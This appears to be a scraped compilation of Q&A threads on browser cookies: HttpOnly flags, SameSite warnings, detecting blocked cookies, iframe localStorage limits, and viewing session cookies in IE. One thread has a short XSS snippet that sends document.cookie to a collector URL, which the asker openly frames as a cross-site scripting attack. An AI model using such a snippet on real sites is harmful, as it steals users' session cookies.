Firebug 1.2 document.cookie inconsistency with Web Developer - javascript

I have a URI here in which a simple document.cookie query through the console is resulting in three cookies being displayed. I verified this with trivial code such as the following as well:
var cookies = document.cookie.split(';');
console.log(cookies.length);
The variable cookies does indeed come out to the number 3. Web Developer on the other hand is indicating that a grand total of 8 cookies are in use.
I'm slightly confused to believe which is inaccurate. I believe the best solution might involve just reiterating the code above without the influence of Firebug. However, I was wondering if someone might suggest a more clever alternative to decipher which tool is giving me the inaccurate information.

One reason might be that the other 5 cookies are HTTPONLY:
http://msdn.microsoft.com/en-us/library/ms533046.aspx
If the HttpOnly attribute is included
in the response header, the cookie is
still sent when the user browses to a
Web site in the valid domain. The
cookie cannot be accessed through
script in Internet Explorer 6 SP1,
even by the Web site that set the
cookie in the first place. This means
that even if a cross-site scripting
bug exists, and the user is tricked
into clicking a link that exploits
this bug, Windows Internet Explorer
does not send the cookie to a third
party. The information is safe.
Firefox also respects this flag (as of v2.0.0.5).

I'm pretty sure the web developer toolbar shows cookies for domain and sub-domains.
So it will show cookies for
abc.xyz.com
xyz.com
whether you are on a page of either domain

Related

Showing cookie was not set

Trying to make something using bloom and shaders in postpreocessing. But I am getting this error in console with a clear white screen. Even I have cleared my cookies, caches and all.
I have also tried to run this in incognito mode, still not working.(Should be it?)
A cookie associated with a cross-site resource at
http://cloudflare.com/ was set without the SameSite attribute. A
future release of Chrome will only deliver cookies with cross-site
requests if they are set with SameSite=None and Secure. You can
review cookies in developer tools under Application>Storage>Cookies
and see more details at
https://www.chromestatus.com/feature/5088147346030592 and
https://www.chromestatus.com/feature/5633521622188032.
This error is not the source of your problem. Note that it says, "A future release of Chrome will only deliver cookies" as in - this is just an informational warning. No functionality has been affected. Can you try recreating this on localhost in incognito mode? That may help you remove the other factors creating spurious warnings.

Detecting Advanced privacy settings in IE using Javascript

At the moment I'm using Modernizr to detect if the client is blocking cookies and provide warnings if it's going to prevent them doing something i.e login or add to cart.
https://github.com/Modernizr/Modernizr/blob/master/feature-detects/cookies.js
However I've found that if you use the Advanced privacy settings to block cookies this is not detected so the user doesn't get any warning and the site will appear to be broken.
I can't seem to find anything that suggests any way around this.
The Modernizr test is a purely client-side test. If IE's settings fool that test, it seems like you'll need to set a cookie in your main response, then do an ajax call and see if the cookie went back to the server. If it did, cookies aren't blocked; if it didn't, they are.
This also has the advantage that it's an end-to-end test: It doesn't matter where the cookie was blocked (the browser, a proxy, etc.), it'll tell you whether cookies currently work for that user in that environment with your site.

Cross-domain localStorage with iframes (Chrome)

I'm trying to store a value on another domain using an iframe (actually, I'm using the xauth library at http://xauth.org/info/). However, when I try to store anything using Chrome, it comes back with "QUOTA_EXCEEDED_ERR: DOM Exception 22", which I've come to recognize as an access error. I've mocked up a couple of very simple pages below to duplicate the effect:
File 1.html:
<html>
<head/>
<iframe src='http://127.0.0.1/2.html' />
</html>
File 2.html:
<html>
<head/>
<script>
console.log(localStorage);
localStorage.setItem('test', '123');
</script>
</html>
If I place both of these on my local server and access localhost/1.html it embeds a frame from 127.0.0.1 (which Chrome considers a separate domain), and I get the same access error as above. At a guess, it looks like even though I'm embedding an iframe from another domain, and the script inside that iframe references the localStorage for that domain properly (as I can see with the console.log(localStorage) line), the permissions for writing to localStorage are coming from the top page's domain.
In short, it looks like no iframe can write to localStorage in Chrome. Does anybody know if there's a way around this particular security "feature"? Or am I doing something wrong?
The problem only occurs when third-party cookies are disabled. Newer versions of Firefox and Opera are also blocking it. In IE and Edge it is still possible although third-party cookies are disabled. If the localStorage would not be blocked in the iframe, a web tracker could simply include a iframe, read the cookie, send it to the parent script, and then send it to the server.
The reason why this is not blocked in IE and Edge is that these browser allow websites to send third-party cookies, which were previously set as first-party cookies, to the server although third-party cookies are blocked. For example, if a user visits facebook on a regular basis, he gets first-party cookies from facebook. When he then visits other websites with facebook's share button, facebook can track him although third-party cookies are disabled. I really do not know why IE and Edge do not block third-party cookie sending, but I would not use these browsers anyway.
The errors the browsers show when third-party cookies are disabled:
Chrome and Opera: Uncaught DOMException: Failed to read the 'localStorage' property from 'Window': Access is denied for this document.
Firefox: SecurityError: The operation is insecure.
IE and Edge: No error, access to localStorage in iframe is possible although third-party cookies are disabled.
So in conclusion, it is not possible to bypass this security feature (in Chrome, Firefox, Opera) and this is good in order to ensure users' privacy.
This is an old post, but if someone else see it- you can use postMessage
https://stackoverflow.com/a/40469196/4836581
Well, localStorage is domain-based and there is no reason for your example code to fail. What it actually does is to set the test item to 123 for 127.0.0.1 whereas it will leave the localhost localStorage empty.
This might not be the answer to your initial problem of QUOTA_EXCEEDED_ERR, but just try to switch to private browsing on Chrome (Ctrl+Shift+N) to see if you still have the error. Without further information on what you were initially doing, I can't tell much but I believe that quota exceeded means what it means...
And I think Chrome's quota is 2.5mb unlike FF which has 5mb of localStorage quota.

Cannot read cookies in Firefox and IE

I have to read cookies using JavaScript. I am using the document.cookie to do that same. But the method works on Google Chrome only, and not on Firefox and IE 8/9. All the web-pages also show document.cookie as a way to do it.
How can I fetch cookies in Firefox and IE using JavaScript?
Thanks
UPDATE
I tested my code on localhost. On testing the code online on blogspot.com, it didn't even work on chrome.
Any ways, here's the HTML code:
<script type="text/javascript">
function sendCookies(){
document.location='http://localhost/xss/getcookies.php?cookie='+escape(document.cookie);
}
</script>
<a onclick="sendCookies()" href="#">
click here </a> to know about XSS attack.
While debugging document.cookie in browsers, it shows value in Chrome only. If I replace localhost link a online link, document.cookie is empty, even on Chrome.
Your possible guess is right. This is a sort of cross-site scripting attack.
Any help on this code will be of good use to me?
UPDATE 2:
Here's the link to the video which shows how to perform XSS attack:
How to perform XSS attack
have you tried using jquery-cookie? https://github.com/carhartl/jquery-cookie
Also, keep in mind that you cannot read http-only cookies with javascript. Though, if you can read the cookies in chrome, it is not an http-only cookie. You can check if a cookie is http-only by going to the resources tab in the debug console in chrome and checking if the HTTP column has a tick mark for the cookie.

How do you view session cookies in Internet Explorer?

I am able to see session cookies in Firefox 3.6 by going to
Tools->Options->Privacy->Remove Individual Cookies
How do I see those same session cookies in IE (6/7/8)?
Tools->Internet Options->Browsing
history Settings->View files
only contains persistent cookies
Also how do I access them programmatically? In Firefox I use the nsICookieManager interface to read the session cookies, does IE contain an equivalent interface?
Cookies set with the HTTPOnly attribute will not be visible to Javascript (e.g. via the document.cookie accessor). In IE8, 9, and 10, hit F12 to open the Developer Tools. Click Cache > View Cookie Information to see persistent and session cookies that apply to the current domain.
This feature is not present in the IE11 version of the tools, which would mean that your choices are 1> Watch outbound Cookie headers in Fiddler or on the Network tab, or 2> Write a plugin that calls the InternetGetCookieEx API with the appropriate flag to include HTTPOnly cookies.
Type into adress-bar:
javascript:alert(document.cookie)
to see the cookies that are currently readable by javascript.
Regarding to the read/write of session-cookies:
Why do you need to do it using javascript? usually session-cookies are needed to have an relation to serverside stored data, so you need to manage the cookies from serverside, no matter what browser there may be.
F12-> Network Tab -> Enable Network Capture Traffic Capturing - > Details Tab -> Request Header Tab.

Categories

Resources